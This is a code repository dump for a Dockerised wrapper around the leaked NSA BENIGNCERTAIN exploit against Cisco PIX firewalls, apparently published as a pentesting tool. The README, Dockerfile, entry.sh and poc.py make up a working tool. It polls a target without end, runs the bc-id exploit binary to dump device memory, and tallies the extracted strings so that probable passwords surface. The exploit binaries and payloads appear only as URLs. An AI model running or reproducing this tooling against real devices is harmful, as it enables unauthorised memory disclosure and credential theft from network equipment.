├── Dockerfile
├── README.md
├── benigncertain
│   ├── 3DES_MD5_payload
│   ├── 3DES_SHA_payload
│   ├── AES_MD5_payload
│   ├── AES_SHA_payload
│   ├── DES_MD5_payload
│   ├── DES_SHA_payload
│   ├── bc-genpkt
│   ├── bc-id
│   ├── bc-parser
│   └── sendpacket.raw
├── entry.sh
├── poc.py
└── requirements.txt

/Dockerfile:
--------------------------------------------------------------------------------
FROM python:3.7
RUN mkdir /exploit
WORKDIR /exploit
COPY . /exploit/
RUN pip install -r requirements.txt
RUN chmod -v +x /exploit/entry.sh
# entry.sh expects the target host as its single argument (passed to `docker run`)
ENTRYPOINT ["/bin/bash", "./entry.sh"]
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# Quickstart
```
$ git clone https://github.com/VirtueSecurity/benigncertain-monitor.git
$ cd benigncertain-monitor
$ sudo docker build . -t benign-monitor
$ sudo docker run -it benign-monitor <host>
```
The service will continuously poll the vulnerable PIX, extract ASCII strings from memory, store the strings in a local sqlite database, and show the most frequently observed strings:

```
Starting monitor against 10.0.6.1
          string  count
0           5$dx      3
1            0(0      3
2           $c{l      3
3         (0"t&j      3
4     R$dkd$hf7!      2
5      %d1N=8$i-      2
6          $c)P0      1
7           1NlD      1
8          1NlD'      1
9         $c)P(0      1
10        $c)P1@_     1
```

# Overview
This dockerized Python script is a wrapper for the NSA BENIGNCERTAIN Cisco exploit. It polls the vulnerable service over time to identify probable passwords and other potentially sensitive information. Because the NSA exploit on its own only reveals a point-in-time snapshot, we built this as a service to show impact over a broader period of time.

# Credit

This service is an open-source component of our service-backed pentesting platform [PurpleLeaf](https://purpleleaf.io).

--------------------------------------------------------------------------------

/benigncertain/3DES_MD5_payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/VirtueSecurity/benigncertain-monitor/a7acc3254b1fb906f6b31a158ecd9ec6b08981e7/benigncertain/3DES_MD5_payload
--------------------------------------------------------------------------------

/benigncertain/3DES_SHA_payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/VirtueSecurity/benigncertain-monitor/a7acc3254b1fb906f6b31a158ecd9ec6b08981e7/benigncertain/3DES_SHA_payload
--------------------------------------------------------------------------------

/benigncertain/AES_MD5_payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/VirtueSecurity/benigncertain-monitor/a7acc3254b1fb906f6b31a158ecd9ec6b08981e7/benigncertain/AES_MD5_payload
--------------------------------------------------------------------------------

/benigncertain/AES_SHA_payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/VirtueSecurity/benigncertain-monitor/a7acc3254b1fb906f6b31a158ecd9ec6b08981e7/benigncertain/AES_SHA_payload
--------------------------------------------------------------------------------

/benigncertain/DES_MD5_payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/VirtueSecurity/benigncertain-monitor/a7acc3254b1fb906f6b31a158ecd9ec6b08981e7/benigncertain/DES_MD5_payload
--------------------------------------------------------------------------------

/benigncertain/DES_SHA_payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/VirtueSecurity/benigncertain-monitor/a7acc3254b1fb906f6b31a158ecd9ec6b08981e7/benigncertain/DES_SHA_payload
--------------------------------------------------------------------------------

/benigncertain/bc-genpkt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/VirtueSecurity/benigncertain-monitor/a7acc3254b1fb906f6b31a158ecd9ec6b08981e7/benigncertain/bc-genpkt
--------------------------------------------------------------------------------

/benigncertain/bc-id:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/VirtueSecurity/benigncertain-monitor/a7acc3254b1fb906f6b31a158ecd9ec6b08981e7/benigncertain/bc-id
--------------------------------------------------------------------------------

/benigncertain/bc-parser:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/VirtueSecurity/benigncertain-monitor/a7acc3254b1fb906f6b31a158ecd9ec6b08981e7/benigncertain/bc-parser
--------------------------------------------------------------------------------

/benigncertain/sendpacket.raw:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/VirtueSecurity/benigncertain-monitor/a7acc3254b1fb906f6b31a158ecd9ec6b08981e7/benigncertain/sendpacket.raw
--------------------------------------------------------------------------------

/entry.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# Usage: entry.sh <host>  (the Docker ENTRYPOINT; the host comes from `docker run`)
if [ -z "$1" ]; then
    echo "host parameter needed"
    exit 1
fi

# Poll indefinitely; each round adds to the sqlite tallies kept by poc.py.
while :
do
    echo "Starting monitor against $1"
    python3 poc.py "$1"

    sleep 20
done

--------------------------------------------------------------------------------

/poc.py:
--------------------------------------------------------------------------------
import sqlite3
import subprocess
import pathlib
import sys
import pandas as pd

# Every string seen in a dump is tallied across polling rounds, so values that
# recur between rounds (candidate credentials, config fragments) rise to the top.
conn = sqlite3.connect('details.db')
c = conn.cursor()
c.execute("CREATE TABLE IF NOT EXISTS result(string TEXT, count INTEGER)")
conn.commit()

if len(sys.argv) != 2:
    print("usage: poc.py <host>")
    sys.exit(1)
host = sys.argv[1]

path = 'benigncertain'
file = pathlib.Path(f'{path}/{host}.raw')

try:
    # bc-id writes the retrieved memory to <host>.raw in its working directory.
    # The host is passed as a separate argument (no shell), and the 10 s limit is
    # enforced by subprocess so that the TimeoutExpired handler below is reachable
    # (the previous `timeout 10s` shell prefix never raised it).
    subprocess.run(["./bc-id", "-t", host], cwd=path, timeout=10,
                   universal_newlines=True,
                   stdout=subprocess.PIPE, stderr=subprocess.STDOUT)

    if file.exists():
        output = subprocess.run(["strings", f"{host}.raw"], cwd=path,
                                universal_newlines=True,
                                stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        words = output.stdout.split()

        for word in words:
            c.execute("SELECT count FROM result WHERE string=?", (word,))
            query = c.fetchone()
            if query is None:
                c.execute("INSERT INTO result(string, count) VALUES(?,?)", (word, 1))
            else:
                c.execute("UPDATE result SET count=? WHERE string=?", (query[0] + 1, word))

        conn.commit()
        file.unlink()  # discard the raw dump; only the tallies are kept

        print(pd.read_sql_query("SELECT * FROM result ORDER BY count DESC", conn))

except subprocess.TimeoutExpired:
    print("'bc-id' binary timed out, this will happen frequently with some hosts.")
finally:
    conn.close()

--------------------------------------------------------------------------------

/requirements.txt:
--------------------------------------------------------------------------------
pandas
--------------------------------------------------------------------------------